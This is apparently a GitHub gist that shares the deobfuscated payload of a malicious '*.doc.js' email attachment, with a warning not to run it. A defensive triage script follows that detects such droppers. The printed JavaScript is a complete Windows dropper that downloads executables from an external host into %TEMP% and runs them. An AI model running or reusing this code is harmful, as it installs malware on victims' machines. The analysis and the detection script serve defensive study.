@penguinpowernz
Created December 17, 2014 22:08
Random JS exploit

DO NOT RUN THIS CODE

Especially on a Windows machine. I got this in an email as an attached zip. The file inside was a *.doc.js file. Real smooth, guys.

The JS in this file was obfuscated, but it generated a function into a string and then eval'd that string. This is the resulting function that would be evaluated:

function dl(fr,fn,rn) {
  var ws = new ActiveXObject("WScript.Shell");
  var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn;
  var xo = new ActiveXObject("MSXML2.XMLHTTP");
  xo.onreadystatechange = function() {
    if (xo.readyState === 4) {
      var xa = new ActiveXObject("ADODB.Stream");
      xa.open();
      xa.type = 1;
      xa.write(xo.ResponseBody);
      xa.position = 0;
      xa.saveToFile(fn,2);
      xa.close();
    };
  };

  try {
    xo.open("GET",fr,false);
    xo.send();

    if (rn > 0) {
      ws.Run(fn,0,0);
    };
  } catch (er) { };
};

dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=8322691","88484923.exe",1);
dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=3458722","18304810.exe",1);
dl("http://amc.s5-tech.com/document.php?id=5450535E0500090D0A240511100B03160B134A070B09&rnd=393383","15727494.exe",1);

Interesting....
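
A static triage check for this kind of attachment, added here as an example and not part of the original gist: it flags the `*.doc.js` double extension and the download, save and run chain visible in the function above, and lists the hosts and drop names passed to `dl`-style calls. It works on the deobfuscated text only; `triage`, `hasDecoyDoubleExtension`, the extension lists and the sample's placeholder host and file name are assumptions made for the example.

```javascript
// Added example: static triage of a script attachment (runs under Node.js).
// The indicator strings are the ones used by the function shown on this page.
const SCRIPT_EXT = /\.(js|jse|vbs|vbe|wsf|wsh)$/i;
const DECOY_EXT = /\.(doc|docx|pdf|xls|xlsx|rtf|txt|jpg)$/i; // assumed list

const INDICATORS = {
  shell: /ActiveXObject\(\s*["']WScript\.Shell["']\s*\)/i,
  http: /ActiveXObject\(\s*["']MSXML2\.XMLHTTP["']\s*\)/i,
  stream: /ActiveXObject\(\s*["']ADODB\.Stream["']\s*\)/i,
  writeDisk: /\.saveToFile\s*\(/i,
  execute: /\.Run\s*\(/i,
  tempDir: /%TEMP%/i,
};

// True for names like "x.doc.js": a script extension hidden behind a document one.
function hasDecoyDoubleExtension(fileName) {
  const m = SCRIPT_EXT.exec(fileName);
  return m !== null && DECOY_EXT.test(fileName.slice(0, m.index));
}

function triage(fileName, source) {
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  // HTTP fetch + binary stream + write to disk + Run together is the dropper chain.
  const chain = ["http", "stream", "writeDisk", "execute"].every((k) => hits.includes(k));
  // Pull (url, dropped file name, run flag) out of dl("...","...",n) style calls.
  const calls = [];
  const re = /\(\s*"(https?:\/\/[^"]+)"\s*,\s*"([^"]+\.exe)"\s*,\s*(\d+)\s*\)/gi;
  for (const m of source.matchAll(re)) {
    calls.push({ host: new URL(m[1]).hostname, dropName: m[2], runs: Number(m[3]) > 0 });
  }
  return { doubleExtension: hasDecoyDoubleExtension(fileName), hits, dropperChain: chain, calls };
}

// Constructed sample: same call pattern as the page, placeholder host and file name.
const SAMPLE = [
  'var ws = new ActiveXObject("WScript.Shell");',
  'var xo = new ActiveXObject("MSXML2.XMLHTTP");',
  'var xa = new ActiveXObject("ADODB.Stream");',
  'xa.saveToFile(fn,2); ws.Run(fn,0,0);',
  'dl("http://malware.example.invalid/document.php?id=00&rnd=1","00000000.exe",1);',
].join("\n");

console.log(JSON.stringify(triage("invoice.doc.js", SAMPLE), null, 2));
```

The matching is purely textual, so the still-obfuscated attachment would only trip the file-name check; the API indicators apply once the eval'd string has been recovered.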
